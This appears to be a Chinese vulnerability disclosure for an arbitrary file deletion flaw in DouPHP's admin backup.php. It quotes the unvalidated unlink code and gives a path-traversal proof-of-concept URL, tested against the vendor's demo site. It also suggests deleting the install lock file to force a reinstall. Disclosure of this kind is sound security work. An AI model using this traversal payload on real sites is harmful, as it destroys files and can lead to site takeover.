DouPHP轻量级企业建站系统后台任意文件删除缺陷

### 简要描述： 某处未验证删除的文件路径，导致可以删除任意文件。 官网演示站测试通过 ### 详细说明： 漏洞文件: /admin/backup.php 第161行 ``` /** +---------------------------------------------------------- * 备份删除 +---------------------------------------------------------- */ if ($_REQUEST['rec'] == 'del') { $sql_file_name = $_GET['sql_file_name']; if ($_POST['confirm']) { if (file_exists("../data/backup/" . $sql_file_name)) { @unlink("../data/backup/" . $sql_file_name); } $dou->create_admin_log($_LANG['backup_del'] . ": " . $sql_file_name); $dou->dou_msg($_LANG['backup_del_success'], 'backup.php?rec=restore'); } else { $_LANG['del_check'] = preg_replace('/d%/Ums', $sql_file_name, $_LANG['del_check']); $dou->dou_msg($_LANG['del_check'], 'backup.php?rec=restore', '', '30', "backup.php?rec=del&sql_file_name=$sql_file_name"); } } ``` 条件： 1、进入此函数需要后台管理员权限 用途？在某些地方，删掉了某些配置，可以导致变量未初始化从而进行利用 比如说安装后生成的lock文件,导致站点可以被重新安装 ### 漏洞证明： http://demo.douco.com/admin/backup.php?rec=del&sql_file_name=../../../robots.txt [<img src="https://images.seebug.org/upload/201405/13192041b6ba3fad77e6651e69244a36f3165d1f.jpg" alt="QQ拼音截图未命名.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/13192041b6ba3fad77e6651e69244a36f3165d1f.jpg) [<img src="https://images.seebug.org/upload/201405/131921146dab22d64d56f0d2cac3b3ba277bd85d.jpg" alt="QQ拼音截图未命名.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/131921146dab22d64d56f0d2cac3b3ba277bd85d.jpg)